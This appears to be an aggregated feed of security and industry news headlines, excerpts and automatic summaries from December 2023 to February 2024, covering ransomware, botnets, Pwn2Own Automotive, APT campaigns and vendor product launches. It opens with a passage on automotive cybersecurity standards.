practices could be the following sequence of steps: establish a cybersecurity management system, i.e., develop and implement basic cybersecurity procedures and policies within the organization; develop a cybersecurity plan that defines the list of protective measures and stages for their implementation; secure the company’s ICT infrastructure by minimizing the risk of attacks on development departments and production sites; secure supporting infrastructure and external services by minimizing the risk of an attack on a vehicle under development or in use; ensure that the project lifecycle meets relevant cybersecurity requirements, from design and secure development to vehicle decommissioning and the recycling of individual components. Risk management for the manufacturer’s ICT infrastructure When it comes to risk management for the ICT infrastructure, it should be kept in mind that the vehicle manufacturer needs to view the ICT infrastructure as the starting point of complex attacks whose ultimate target is the vehicle, supporting infrastructure, and the data of passengers and vehicle owners (individuals as well as legal entities).According to ISO 26262, the lifecycle of a vehicle project is divided into 5 phases (we will use this division, because the phases defined in ISO 26262 are more detailed than those in ISO 21434): concept phase; product development phase; production phase; operation and maintenance phase; end of cybersecurity support and decommissioning phase. Some functionality (monitoring, secure downloading and installation of updates, user/owner change scenarios, etc.) is implemented in the vehicle, and some is implemented in supporting infrastructure.Three phases are identified in the project lifecycle: the concept phase, the development phase (which includes cybersecurity development and validation) and the post-development phase (which includes production, operation, and maintenance, as well as the end of cybersecurity support and decommissioning). Requirements of UNECE and international standards UN Regulations 155 and 156 contain top-level requirements that can be divided into two categories: process-oriented requirements, which have to do with security management at the level of the organization, and project-oriented requirements, which have to do with ensuring the security of everything being produced – whether the vehicles themselves or individual systems and components. "

    ---

    After FBI Takedown, KV-Botnet Operators Shift Tactics in Attempt to Bounce Back

    industry
    2024-02-07 https://thehackernews.com/2024/02/after-fbi-takedown-kv-botnet-operators.html
    The threat actors behind the KV-botnet made "behavioral changes" to the malicious network as U.S. law enforcement began issuing commands to neutralize the activity. KV-botnet is the name given to a network of compromised small office and home office (SOHO) routers and firewall devices across the world, with one specific cluster acting as a covert data transfer system for other Chinese "

    Autosummary: "We observed the KV-botnet operators begin to restructure, committing eight straight hours of activity on December 8, 2023, nearly ten hours of operations the following day on December 9, 2023, followed by one hour on December 11, 2023," Lumen said in a technical report shared with The Hacker News. "

    ---

    Microsoft Outlook December updates trigger ICS security alerts

    industry
    2024-02-05 https://www.bleepingcomputer.com/news/microsoft/microsoft-outlook-december-updates-trigger-ics-security-alerts/
    Microsoft is investigating an issue that triggers Outlook security alerts when trying to open .ICS calendar files after installing December 2023 Patch Tuesday Office security updates. [...] "

    Autosummary: "

    ---

    Iranian hackers breached Albania’s Institute of Statistics (INSTAT)

    industry
    2024-02-02 https://securityaffairs.com/158555/hacking/iranian-hackers-hit-albania-instat.html
    Albania’s Institute of Statistics (INSTAT) announced that it was targeted by a sophisticated cyberattack that affected some of its systems. A sophisticated cyberattack on Wednesday hit Albania’s Institute of Statistics (INSTAT). The institute confirmed that the attack affected some of its systems. Albania’s Institute of Statistics (INSTAT) promptly activated emergency protocols to respond to the […] "

    Autosummary: Albania"s cyber agency AKCESK is now collaborating with state… — The Record From Recorded Future News (@TheRecord_Media) February 2, 2024 In December 2023, Albania’s National Authority for Electronic Certification and Cyber Security (AKCESK) revealed that cyber attacks hit the Assembly of the Republic of Albania and telecom company One Albania. Pierluigi Paganini February 02, 2024 February 02, 2024 Albania’s Institute of Statistics (INSTAT) announced that it was targeted by a sophisticated cyberattack that affected some of its systems. "

    ---

    Spotify"s content filter fails to block explicit lyrics in dozens of hits

    industry
    2024-02-01 https://www.bbc.co.uk/news/entertainment-arts-68126890?at_medium=RSS&at_campaign=KARANGA
    Fans are shown swear words and racial slurs in dozens of songs even when explicit content is blocked. "

    Autosummary: "

    ---

    Why the Right Metrics Matter When it Comes to Vulnerability Management

    exploits industry
    2024-02-01 https://thehackernews.com/2024/02/why-right-metrics-matter-when-it-comes.html
    How’s your vulnerability management program doing? Is it effective? A success? Let’s be honest, without the right metrics or analytics, how can you tell how well you’re doing, progressing, or if you’re getting ROI? If you’re not measuring, how do you know it’s working? And even if you are measuring, faulty reporting or focusing on the wrong metrics can create blind spots and make it harder to "

    Autosummary: This article will help you identify and define the key metrics that you need to track the state of your vulnerability management program, the progress you"ve made, so you can create audit-ready reports that: Prove your security posture Meet vulnerability remediation SLAs and benchmarks Help pass audits and compliance Demonstrate ROI on security tools Simplify risk analysis Prioritize resource allocation Why you need to measure vulnerability management Metrics play a critical role in gauging the effectiveness of your vulnerability and attack surface management.Cyber hygiene, scan coverage, average time to fix, vulnerability severity, remediation rates, vulnerability exposure… the list is endless. When a new vulnerability that could critically affect your systems is identified, Intruder will automatically kick-off a scan Attack surface monitoring This helps you see the percentage of assets that are protected across your attack surface, discovered or undiscovered. As your attack surface evolves, changes and grows over time, it"s important to monitor any changes to what"s covered and your IT environment, such as recently opened ports and services. "

    ---

    Spotify"s filter fails to block explicit lyrics

    industry
    2024-02-01 https://www.bbc.co.uk/news/entertainment-arts-68126890
    Fans are shown swear words and racial slurs in dozens of songs even when explicit content is blocked. "

    Autosummary: "

    ---

    Cybercriminals replace familiar tactics to exfiltrate sensitive data

    industry ciber
    2024-01-31 https://www.helpnetsecurity.com/2024/01/31/ransomware-attacks-changing-tactics/
    

    Ransomware attacks are increasing again as cybercriminals’ motivation shifts to data exfiltration, according to Delinea. The familiar tactics of crippling a company and holding it hostage have been replaced by new strategies that use stealth to exfiltrate private and sensitive data. Cybercriminals then frequently threaten to sell it to the highest bidder on the darknet or leverage it to reap a handsome cyber insurance payment. Ransomware on the rise Although not back at the levels … More →

    The post Cybercriminals replace familiar tactics to exfiltrate sensitive data appeared first on Help Net Security.

    "

    Autosummary: Changing tactics in ransomware attacks As their main goals changed, cybercriminals modified their tactics and moved away from using email as a preferred attack vector (down from 52% to 37%), targeting cloud (44%) and compromised applications (39%) instead. "

    ---

    ICS and OT threat predictions for 2024

    industry
    2024-01-31 https://ics-cert.kaspersky.com/publications/ics-and-ot-threat-predictions-for-2024/
    Most of the described trends have been observed before. However, some of them have reached a critical mass of creeping changes, which could lead to a qualitative shift in the threat landscape "

    Autosummary: "

    ---

    VikingCloud THOR AI offers real-time interactive analytics

    industry
    2024-01-31 https://www.helpnetsecurity.com/2024/01/31/vikingcloud-thor-ai/
    

    VikingCloud announced THOR AI (Threat Hunting and Orchestrated Response), a generative AI-powered cybersecurity chatbot. The new complimentary cyber defense tool is designed to assist companies of all sizes find more vulnerabilities faster – before they become disruptive threats to their business. THOR AI is built on two recently filed patent-pending innovations for (1) THOR AI’s algorithms based on VikingCloud’s cybersecurity and compliance dataset, and (2) persona-based communications customization. The company currently has 28 granted patents. … More →

    The post VikingCloud THOR AI offers real-time interactive analytics appeared first on Help Net Security.

    "

    Autosummary: Proprietary models will accurately identify the level of cybersecurity expertise of individual users, from non-existent to CISO-level capabilities – making the solution highly-adoptable, easy-to-use, and effective. "

    ---

    Experian Fraud Protect enables automotive dealers to detect and prevent fraud

    industry
    2024-01-31 https://www.helpnetsecurity.com/2024/01/31/experian-fraud-protect/
    

    With more of the vehicle buying journey shifting online and vehicle prices remaining at elevated levels, fraudsters are targeting the automotive industry at an increasing rate. To address the rising threat, Experian launched Fraud Protect, a web-based application that helps automotive dealers detect and prevent fraud while maintaining a positive shopping experience for the consumer. According to a recent Experian report, nearly 70% of businesses reported that fraud losses have increased in recent years. Among … More →

    The post Experian Fraud Protect enables automotive dealers to detect and prevent fraud appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    HaystackID enhances Protect Analytics AI Suite to strengthen data analysis

    industry
    2024-01-30 https://www.helpnetsecurity.com/2024/01/30/haystackid-protect-analytics-ai-suite/
    

    HaystackID announced the expansion of its Protect Analytics AI Suite of AI enabled services designed to enhance the efficiency and effectiveness of identifying, analyzing, and reporting on sensitive information within large, unstructured datasets. The enhanced suite featuring Protect Analytics AI – Sensitive Data Identification, Protect Analytics AI – Entity Extraction, and Protect Analytics AI – Deploy continues to transform cybersecurity-centric incident responses, breach investigations, and notification actions by decreasing time to precision insight and action … More →

    The post HaystackID enhances Protect Analytics AI Suite to strengthen data analysis appeared first on Help Net Security.

    "

    Autosummary: Key cross-functional features of the Protect Analytics AI Suite, enabled through a combination of custom development and multimodal integration of best-of-breed AI and large language model (LLM) tools, include: Interactive visualizations : Through integration with tools like Microsoft Power BI, the suite provides interactive data visualizations, enabling users to sort, query, and analyze sensitive data swiftly and effectively. "

    ---

    US threatens to reimpose sanctions on Venezuelan oil sector

    industry
    2024-01-30 https://www.bbc.co.uk/news/world-latin-america-68139518?at_medium=RSS&at_campaign=KARANGA
    The move comes after Venezuela"s Supreme Court upheld a ban on the main opposition candidate. "

    Autosummary: "

    ---

    US threatens to reimpose oil sanctions on Venezuela

    industry
    2024-01-30 https://www.bbc.co.uk/news/world-latin-america-68139518
    The move comes after Venezuela"s Supreme Court upheld a ban on the main opposition candidate. "

    Autosummary: "

    ---

    India"s ancient carpet weaving industry meets AI

    industry
    2024-01-30 https://www.bbc.co.uk/news/business-67650613
    Kashmir"s handmade carpet industry is trying to maintain its traditions while staying competitive. "

    Autosummary: "

    ---

    Energy giant Schneider Electric hit by Cactus ransomware attack

    exploits ransomware industry
    2024-01-29 https://www.bleepingcomputer.com/news/security/energy-giant-schneider-electric-hit-by-cactus-ransomware-attack/
    Energy management and automation giant Schneider Electric suffered a Cactus ransomware attack leading to the theft of corporate data, according to people familiar with the matter. [...] "

    Autosummary: Outage message on Schneider Electric"s Resource Advisor platform Source: BleepingComputer Customers of Schneider Electric"s Sustainability Business division include Allegiant Travel Company, Clorox, DHL, DuPont, Hilton, Lexmark, PepsiCo, and Walmart. Like all ransomware operations, the threat actors will breach corporate networks through purchased credentials, partnerships with malware distributors, phishing attacks, or by exploiting vulnerabilities. "

    ---

    Participants earned more than $1.3M at the Pwn2Own Automotive competition

    industry
    2024-01-27 https://securityaffairs.com/158202/hacking/pwn2own-automotive-day-three.html
    Bug bounty hunters earned more than $1.3 million for hacking Teslas, infotainment systems, and electric vehicle chargers at the Pwn2Own Automotive competition. The Zero Day Initiative’s Pwn2Own Automotive competition has ended, participants demonstrated 49 zero-day vulnerabilities affecting automotive products earning a total of $1,323,750. The amazing Synacktiv team won the competition and earned a total […] "

    Autosummary: Participants earned more than $1.3M at the Pwn2Own Automotive competition Pierluigi Paganini January 27, 2024 January 27, 2024 Bug bounty hunters earned more than $1.3 million for hacking Teslas, infotainment systems, and electric vehicle chargers at the Pwn2Own Automotive competition. "

    ---

    Emerging trends and strategies in digital forensics

    industry
    2024-01-26 https://www.helpnetsecurity.com/2024/01/26/amber-schroader-paraben-digital-forensics-trends/
    

    In this Help Net Security interview, Amber Schroader, CEO at Paraben Corporation, discusses the challenges posed by the complexity of modern computer systems and networks on digital evidence collection. Schroader talks about the impact of exponential data growth on forensic practices, the role of AI in optimizing investigations, and emphasizes the need for professionals to adapt to the changing dynamics of digital investigations, along with cross-education in related fields. How has the complexity of modern … More →

    The post Emerging trends and strategies in digital forensics appeared first on Help Net Security.

    "

    Autosummary: Schroader talks about the impact of exponential data growth on forensic practices, the role of AI in optimizing investigations, and emphasizes the need for professionals to adapt to the changing dynamics of digital investigations, along with cross-education in related fields.The cross-sharing of app data and just data, in general, has been streamlined, and our investigative scope is changing as well. "

    ---

    Pwn2Own Automotive 2024 Day 2 – Tesla hacked again

    industry
    2024-01-26 https://securityaffairs.com/158141/hacking/pwn2own-automotive-2024-day-two.html
    Researchers hacked the Tesla infotainment system and found 24 zero-days on day 2 of Pwn2Own Automotive 2024 hacking competition. White hat hackers from the Synacktiv Team (@Synacktiv) compromised the Tesla infotainment system on the second day of the Pwn2Own Automotive 2024 hacking competition. The bug hunters chained two vulnerabilities to hack the Tesla infotainment system, […] "

    Autosummary: Pwn2Own Automotive 2024 Day 2 – Tesla hacked again Pierluigi Paganini January 26, 2024 January 26, 2024 Researchers hacked the Tesla infotainment system and found 24 zero-days on day 2 of Pwn2Own Automotive 2024 hacking competition. "

    ---

    Pwn2Own Automotive: $1.3M for 49 zero-days, Tesla hacked twice

    exploits industry
    2024-01-26 https://www.bleepingcomputer.com/news/security/pwn2own-automotive-13m-for-49-zero-days-tesla-hacked-twice/
    The first edition of Pwn2Own Automotive has ended with competitors earning $1,323,750 for hacking Tesla twice and demoing 49 zero-day bugs in multiple electric car systems between January 24 and January 26. [...] "

    Autosummary: "

    ---

    New CherryLoader Malware Mimics CherryTree to Deploy PrivEsc Exploits

    exploits industry
    2024-01-25 https://thehackernews.com/2024/01/new-cherryloader-malware-mimics.html
    A new Go-based malware loader called CherryLoader has been discovered by threat hunters in the wild to deliver additional payloads onto compromised hosts for follow-on exploitation. Arctic Wolf Labs, which discovered the new attack tool in two recent intrusions, said the loader"s icon and name masquerades as the legitimate CherryTree note-taking application to dupe potential victims "

    Autosummary: "

    ---

    Tesla hacked, 24 zero-days demoed at Pwn2Own Automotive 2024

    exploits industry
    2024-01-24 https://www.bleepingcomputer.com/news/security/tesla-hacked-24-zero-days-demoed-at-pwn2own-automotive-2024/
    Security researchers hacked a Tesla Modem and collected awards of $722,500 on the first day of Pwn2Own Automotive 2024 for three bug collisions and 24 unique zero-day exploits. [...] "

    Autosummary: "

    ---

    Tencent"s Riot Games cuts 11% of global workforce

    industry
    2024-01-23 https://www.bbc.co.uk/news/business-68064952?at_medium=RSS&at_campaign=KARANGA
    Riot Games is the latest to cut jobs in the gaming industry after Amazon, ByteDance and Epic Games. "

    Autosummary: "

    ---

    Swimlane enhances Turbine platform to alleviate the pressure on SecOps teams

    industry
    2024-01-18 https://www.helpnetsecurity.com/2024/01/18/swimlane-turbine-platform/
    

    Swimlane announced its new Turbine innovations, Canvas and Hero AI. This transformative combination empowers security teams to build automation in seconds with limitless integration possibilities, leading to dramatic time and resource savings. SecOps teams are drowning in a sea of alerts and evolving threats while facing a chronic shortage of qualified staff. This critical gap leaves organizations dangerously exposed as adversaries evolve their tactics and accelerate their attacks. Recognizing this urgent need, Swimlane has revolutionized … More →

    The post Swimlane enhances Turbine platform to alleviate the pressure on SecOps teams appeared first on Help Net Security.

    "

    Autosummary: Text-to-Code ChatBot: Low-code solutions allow analysts to build use cases in a no-code fashion, but for power users and real-time security operations, a snippet of code might be urgently needed. Everyone needs a hero: Bringing together humans, automation, and AI to elevate security operations Hero AI, Swimlane’s collection of AI-enabled innovations, enhances the automation solutions available for the Swimlane Turbine platform.Recognizing this urgent need, Swimlane has revolutionized its Turbine low-code automation platform with advancements that strengthen security teams by connecting them, their telemetry, and technology through a human-centric AI and automation building experience. "

    ---

    Industrial Defender collaborates with Dragos to enhance outcomes for OT operators

    industry
    2024-01-17 https://www.helpnetsecurity.com/2024/01/17/industrial-defender-dragos-partnership/
    

    Industrial Defender announced a strategic technology partnership with Dragos. The collaboration between these leaders in OT cybersecurity integrates their respective platform capabilities, representing a major move towards combining their leading strengths to enhance outcomes for OT operators. The partnership is centered around the shared goal of enhancing the security and resilience of critical infrastructure and manufacturing facilities. The intent of this collaboration is to bring together the unique strengths of both Industrial Defender and Dragos. … More →

    The post Industrial Defender collaborates with Dragos to enhance outcomes for OT operators appeared first on Help Net Security.

    "

    Autosummary: “Industrial Defender’s longstanding expertise in ICS/OT security is well-recognized in operational environments,” said Matt Cowell, Global VP of Business Development, Dragos. "

    ---

    Tsurugi Linux: Tailoring user experience for digital forensics and OSINT investigations

    industry Linux
    2024-01-16 https://www.helpnetsecurity.com/2024/01/16/tsurugi-linux-open-source-dfir-analysis/
    

    Tsurugi Linux is a heavily customized open-source distribution focused on supporting DFIR investigations. The project focuses mainly on live forensics analysis, post-mortem analysis, and digital evidence acquisition. Users can also perform malware analysis, OSINT and computer vision activities. “We’ve crafted a user-friendly experience, organizing the main menu in a logical forensic analysis sequence. Our menu is your roadmap from device acquisition to integrity checks, artifact extraction, and reporting tools. It’s not just about familiarity; it’s … More →

    The post Tsurugi Linux: Tailoring user experience for digital forensics and OSINT investigations appeared first on Help Net Security.

    "

    Autosummary: And for the seasoned experts, every tool is at your fingertips, ready to be wielded precisely through the command line console,” Giovanni Rattaro, Tsurugi Linux core developer, told Help Net Security. "

    ---

    DDoS Attacks on the Environmental Services Industry Surge by 61,839% in 2023

    industry
    2024-01-15 https://thehackernews.com/2024/01/ddos-attacks-on-environmental-services.html
    The environmental services industry witnessed an “unprecedented surge” in HTTP-based distributed denial-of-service (DDoS) attacks, accounting for half of all its HTTP traffic. This marks a 61,839% increase in DDoS attack traffic year-over-year, web infrastructure and security company Cloudflare said in its DDoS threat report for 2023 Q4 published last week. “This surge in cyber attacks coincided "

    Autosummary: Akamai, which also published its own retrospective on DDoS Trends in 2023, said "DDoS attacks became more frequent, longer, highly sophisticated (with multiple vectors), and focused on horizontal targets (attacking multiple IP destinations in the same attack event). "

    ---

    US court docs expose fake antivirus renewal phishing tactics

    financial industry
    2024-01-15 https://www.bleepingcomputer.com/news/security/us-court-docs-expose-fake-antivirus-renewal-phishing-tactics/
    In a seizure warrant application, the U.S. Secret Service sheds light on how threat actors stole $34,000 using fake antivirus renewal subscription emails. [...] "

    Autosummary: The victim calls the phone number listed on the email, and from there, the scammers direct them to perform various actions such as installing remote access software on their computers, infecting themselves with malware, and entering their account credentials on a phishing page. "

    ---

    New Findings Challenge Attribution in Denmark"s Energy Sector Cyberattacks

    industry ciber
    2024-01-14 https://thehackernews.com/2024/01/new-findings-challenge-attribution-in.html
    The cyber attacks targeting the energy sector in Denmark last year may not have had the involvement of the Russia-linked Sandworm hacking group, new findings from Forescout show. The intrusions, which targeted around 22 Danish energy organizations in May 2023, occurred in two distinct waves, one which exploited a security flaw in Zyxel firewall (CVE-2023-28771) and a "

    Autosummary: "

    ---

    Attacks against Denmark ‘s energy sector were not carried out by Russia-linked APT

    industry
    2024-01-14 https://securityaffairs.com/157438/hacking/denmark-energy-sector-attacks-attribution.html
    Forescout experts questioned the attribution of cyber attacks that targeted the energy sector in Denmark in 2023 to the Russia-linked Sandworm. Forescout experts shared findings from their analysis of the cyber attacks that targeted the energy sector in Denmark in 2023, attributing them to the Russia-linked Sandworm. In May, Danish critical infrastructure faced the biggest […] "

    Autosummary: Below is the Cyber Kill Chain for the overall attack described in the report: “To this day, there is no clear explanation of how the attackers had the necessary information, but we can state that among the 300 members, they did not miss a single shot.” continues the report. On April 25, 2023, Zyxel disclosed a critical vulnerability (CVSS score 9.8), tracked as CVE-2023-28771, in a number of their firewalls. "

    ---

    Embracing offensive cybersecurity tactics for defense against dynamic threats

    industry ciber
    2024-01-11 https://www.helpnetsecurity.com/2024/01/11/alexander-hagenah-offensive-cybersecurity-measures/
    

    In this Help Net Security, Alexander Hagenah, Head of Cyber Controls at SIX, discusses the critical steps in creating effective offensive security operations and their impact on organizational security strategies. What are the critical steps in creating effective offensive security operations, and how do they impact an organization’s security strategy? The art of war in cybersecurity, much like Sun Tzu’s teachings, hinges on knowing the enemy. But it’s not just about knowing – it’s about … More →

    The post Embracing offensive cybersecurity tactics for defense against dynamic threats appeared first on Help Net Security.

    "

    Autosummary: In this Help Net Security, Alexander Hagenah, Head of Cyber Controls at SIX, discusses the critical steps in creating effective offensive security operations and their impact on organizational security strategies. While it’s challenging to match their resources, focusing on agility, smart intelligence gathering, and collaborative defense strategies can provide effective countermeasures.By pooling resources, knowledge, and intelligence, a coalition approach facilitates a more comprehensive and effective response to cyber threats. "

    ---

    The power of basics in 2024’s cybersecurity strategies

    industry ciber
    2024-01-10 https://www.helpnetsecurity.com/2024/01/10/cyber-defense-basics-video/
    

    In this Help Net Security video, Nick Carroll, Cyber Incident Response Manager at Raytheon, discusses how while organizations will be challenged to strengthen their defenses faster than cyber threats are evolving, this ‘come from behind’ rush to keep pace with attackers can often lead to the harmful practice of organizations skipping the foundational basics of cyber defense and failing to establish a general sense of cyber awareness within the business.

    The post The power of basics in 2024’s cybersecurity strategies appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Attackers could use vulnerabilities in Bosch Rexroth nutrunners to disrupt automotive production

    industry
    2024-01-09 https://www.helpnetsecurity.com/2024/01/09/vulnerabilities-bosch-rexroth/
    

    Researchers have discovered over two dozen vulnerabilities in “smart” cordless nutrunners (i.e., pneumatic torque wrenches) manufactured by Bosch Rexroth that could be exploited to make the devices inoperable or their output unreliable. “Depending on a manufacturer’s use and business configuration, devices such as the nutrunner may form a critical part of the quality management and assurance program in an enterprise, possibly even the last line of quality assurance. Compromise of the integrity in this final … More →

    The post Attackers could use vulnerabilities in Bosch Rexroth nutrunners to disrupt automotive production appeared first on Help Net Security.

    "

    Autosummary: After probing the security posture of the Bosch Rexroth NXA015S-36V-B nutrunner and discovering 25 vulnerabilities affecting the device’s management web application and the services parsing communications protocols, the researchers successfully tested two attack scenarios in their lab: Deployment of custom ransomware (specifically designed for the devices’ OS), and Steathy alteration of tightening programs (while manipulating the onboard display) “We were able to make the device completely inoperable by preventing a local operator from controlling the drill through the onboard display and disabling the trigger button. "

    ---

    Industrial Defender Risk Signal integrates threat intelligence and business context

    industry
    2024-01-04 https://www.helpnetsecurity.com/2024/01/04/industrial-defender-risk-signal/
    

    Industrial Defender introduced Industrial Defender Risk Signal, its new risk-based vulnerability management (RBVM) solution. Building upon the company’s robust vulnerability assessment capabilities, Industrial Defender Risk Signal intelligently prioritizes vulnerability for highest impact, integrating threat intelligence and the user’s specific business context. Industrial Defender’s RBVM solution enables a significant evolution in vulnerability management for industrial environments. With enriched insights into which vulnerabilities matter most to the user’s specific operations, security teams can use Industrial Defender Risk … More →

    The post Industrial Defender Risk Signal integrates threat intelligence and business context appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    UAC-0050 Group Using New Phishing Tactics to Distribute Remcos RAT

    financial industry
    2024-01-04 https://thehackernews.com/2024/01/uac-0050-group-using-new-phishing.html
    The threat actor known as UAC-0050 is leveraging phishing attacks to distribute Remcos RAT using new strategies to evade detection from security software. "The group"s weapon of choice is Remcos RAT, a notorious malware for remote surveillance and control, which has been at the forefront of its espionage arsenal," Uptycs security researchers Karthick Kumar and Shilpesh Trivedi said in "

    Autosummary: "

    ---

    Key cybersecurity skills gap statistics you should be aware of

    industry ciber
    2024-01-02 https://www.helpnetsecurity.com/2024/01/02/cybersecurity-skills-gap-statistics/
    

    As the sophistication and frequency of cyber threats continue to escalate, the demand for skilled cybersecurity professionals has never been bigger. The skills gap is not merely a statistical discrepancy; it represents a substantial vulnerability in the defense mechanisms of businesses and institutions. From the shortage of experts in critical areas such as penetration testing and threat analysis to the broader issues of workforce diversity and continuous skill development, the problems contributing to this gap … More →

    The post Key cybersecurity skills gap statistics you should be aware of appeared first on Help Net Security.

    "

    Autosummary: Soft skills continue to challenge the cybersecurity sector When looking at soft skills, communication (58%), critical thinking (54%), problem-solving (49%), teamwork (45%), and attention to detail (36%) come in as the top five skills employers are seeking in cybersecurity job candidates. "

    ---

    Hackers employ nuanced tactics to evade detection

    industry
    2024-01-02 https://www.helpnetsecurity.com/2024/01/02/2023-holiday-attacks/
    

    Threat actors evolved tactics, opting for a more nuanced approach that spread attacks across a broader timeframe to blend in with legitimate traffic and evade detection during peak holiday shopping times, according to Cequence Security. 2023 holiday season unveiled alarming realities The months before the 2023 holidays demonstrated a change in tactics, techniques, and procedures by adversaries against prominent retailers. Attackers have shown that they are highly sophisticated and have great persistence and depth of … More →

    The post Hackers employ nuanced tactics to evade detection appeared first on Help Net Security.

    "

    Autosummary: In the second half of 2023 alone, gift card fraud increased by 110%, while scraping, loyalty card fraud and payment card fraud increased by a collective average of over 700% as attackers lay the groundwork for holiday sale attacks ahead of retailer security crackdowns. "

    ---

    Wi-Fi 7’s mission-critical role in enterprise, industrial networking

    industry
    2024-01-02 https://www.helpnetsecurity.com/2024/01/02/tiago-rodrigues-wireless-broadband-alliance-wi-fi-7-networks/
    

    As we transition from Wi-Fi 6 to the more advanced Wi-Fi 7, we uncover the significant enhancements in speed, efficiency, and spectrum usage that set it apart from its predecessors. In this Help Net Security interview, Tiago Rodrigues, CEO at Wireless Broadband Alliance, discusses the transformative world of Wi-Fi 7, exploring its features and the impact it promises to have on our digital landscape. Rodrigues examines the crucial role of AI and machine learning in … More →

    The post Wi-Fi 7’s mission-critical role in enterprise, industrial networking appeared first on Help Net Security.

    "

    Autosummary: We expect network executives will continue deploying Wi-Fi and cellular in the coming years, with Wi-Fi 6E/7 for indoor, on-campus, and fixed network situations and 5G/cellular for outdoor, off-campus, and fast-mobility environments. Wi-Fi 7 will enable consumer, enterprise, Industry 4.0, medical, smart city and other applications that are impractical or impossible with other wired and wireless technologies, providing twice the bandwidth of Wi-Fi 6 and providing features such as deterministic network support. Wi-Fi 6, 6E and 7 topped the list of wireless technologies that network operators, ISPs, device and chipset vendors, enterprises and other companies plan to deploy by the end of 2024, in our latest cross-industry report. "

    ---

    Argentina pulls out of plans to join Brics bloc

    latam industry
    2023-12-29 https://www.bbc.co.uk/news/world-latin-america-67842992?at_medium=RSS&at_campaign=KARANGA
    It had been due in a few days to join the group, seen as a counterweight to the Western-led world. "

    Autosummary: "

    ---

    Eagers Automotive halts trading in response to cyberattack

    industry ciber
    2023-12-28 https://www.bleepingcomputer.com/news/security/eagers-automotive-halts-trading-in-response-to-cyberattack/
    Eagers Automotive has announced it suffered a cyberattack and was forced to halt trading on the stock exchange as it evaluates the impact of the incident. [...] "

    Autosummary: Eagers Automotive is the largest operator of car dealerships in Australia and New Zealand, with over 300 selling points for brands such as Toyota, BMW, Nissan, Mercedes-Benz, Audi, Ford, VW, and Honda. "

    ---

    Essential DDoS statistics for understanding attack impact

    industry
    2023-12-27 https://www.helpnetsecurity.com/2023/12/27/ddos-attack-2023-statistics/
    

    The impact of DDoS attacks extends far beyond mere inconvenience, as they can result in financial losses, compromised data, and erosion of customer trust. Understanding the nature and consequences of DDoS activity is essential for organizations and individuals alike as they strive to protect their online presence and ensure the uninterrupted flow of critical services. In this article, you will find excerpts from DDoS attack surveys we covered in 2023. This data will enable your … More →

    The post Essential DDoS statistics for understanding attack impact appeared first on Help Net Security.

    "

    Autosummary: Global rise in DDoS attacks threatens digital infrastructure In 2022, the total number of DDoS attacks worldwide increased by 115.1% over the amount observed in 2021, according to Nexusguard. "

    ---

    Data security and cost are key cloud adoption challenges for financial industry

    financial industry
    2023-12-27 https://www.helpnetsecurity.com/2023/12/27/financial-services-cloud-adoption/
    

    91% of banks and insurance companies have now initiated their cloud journey, a significant increase from 2020, when only 37% of firms had embarked on their cloud transformations, according to Capgemini. However, this high rate and its corresponding investment does not translate to effective cloud adoption at scale. More than 50% of firms surveyed have only moved a minimal portion of their core business applications to the cloud. 89% of financial services executives believe that … More →

    The post Data security and cost are key cloud adoption challenges for financial industry appeared first on Help Net Security.

    "

    Autosummary: Cloud migration priorities include risk and customer relationship management Industry executives surveyed in this report across health insurance, life insurance, capital markets, payments, retail banks and wealth management, identify risk management and customer relationship management (CRM) amongst their top three areas ripe for early cloud adoption. Recently, the Digital Operational Resilience Act (DORA) mandated that financial institutions subject to European Union (EU) regulations must rigorously implement, document, and uphold the requisite systems, protocols, and tools to provide sufficient reliability, capacity, and resilience. "

    ---

    Renewable energy drive for indigenous groups in Colombia

    latam industry
    2023-12-27 https://www.bbc.co.uk/news/world-latin-america-67825466?at_medium=RSS&at_campaign=KARANGA
    Local communities and indigenous groups can now set up partnerships to produce and sell renewable energy. "

    Autosummary: "

    ---

    3 main tactics attackers use to bypass MFA

    industry
    2023-12-26 https://www.helpnetsecurity.com/2023/12/26/tactics-bypass-mfa/
    

    Notable security breaches have bypassed MFA to compromise taxi broker Uber, games company EA, and authentication business Okta, according to SE Labs. CISOs must bolster MFA protections SE Labs advised CISOs to step-up their efforts against attacks on systems protected by MFA in response to increased attacker activity to exploit failure points. As is often the case when compromising systems, attackers have not reinvented the wheel to circumvent MFA, or 2FA (two-factor authentication), as it … More →

    The post 3 main tactics attackers use to bypass MFA appeared first on Help Net Security.

    "

    Autosummary: “MFA is still one of the best security measures people can use since the password was invented, but as organisations shore up their defences deploying it, so attackers are switching tactics and working hard to find ways around it,” says Simon Edwards, CEO of SE Labs. "

    ---

    Carbanak Banking Malware Resurfaces with New Ransomware Tactics

    financial exploits ransomware industry
    2023-12-26 https://thehackernews.com/2023/12/carbanak-banking-malware-resurfaces.html
    The banking malware known as Carbanak has been observed being used in ransomware attacks with updated tactics. "The malware has adapted to incorporate attack vendors and techniques to diversify its effectiveness," cybersecurity firm NCC Group said in an analysis of ransomware attacks that took place in November 2023. "Carbanak returned last month through new "

    Autosummary: " The company"s data shows that industrials (33%), consumer cyclicals (18%), and healthcare (11%) emerged as the top targeted sectors, with North America (50%), Europe (30%), and Asia (10%) accounting for most of the attacks. "

    ---

    Iran-linked APT33 targets Defense Industrial Base sector with FalseFont backdoor

    industry
    2023-12-25 https://securityaffairs.com/156366/apt/apt33-falsefont-targets-defense-sector.html
    Microsoft reports that the Iran-linked APT33 group is targeting defense contractors worldwide with FalseFont backdoor. Microsoft says the APT33 (aka Peach Sandstorm, Holmium, Elfin, and Magic Hound) Iranian cyber-espionage group is using recently discovered FalseFont backdoor malware to attack against organizations in the Defense Industrial Base (DIB) sector. “Microsoft has observed the Iranian nation-state actor Peach Sandstorm attempting to […] "

    Autosummary: Iran-linked APT33 targets Defense Industrial Base sector with FalseFont backdoor Pierluigi Paganini December 25, 2023 December 25, 2023 Microsoft reports that the Iran-linked APT33 group is targeting defense contractors worldwide with FalseFont backdoor. "

    ---

    New insights into the global industrial cybersecurity landscape

    industry ciber
    2023-12-22 https://www.helpnetsecurity.com/2023/12/22/critical-infrastructure-security-professionals-video/
    

    In this Help Net Security video, William Noto, VP and Industry Principal for Claroty, discusses their recent global survey of 1,100 IT and OT security professionals who work in critical infrastructure sectors. When it comes to ransomware attacks, the impact on OT environments is catching up to the impact on IT environments, according to Claroty. Of the 75% of respondents whose organizations were targeted by ransomware attacks in the past year, 69% paid the ransom, … More →

    The post New insights into the global industrial cybersecurity landscape appeared first on Help Net Security.

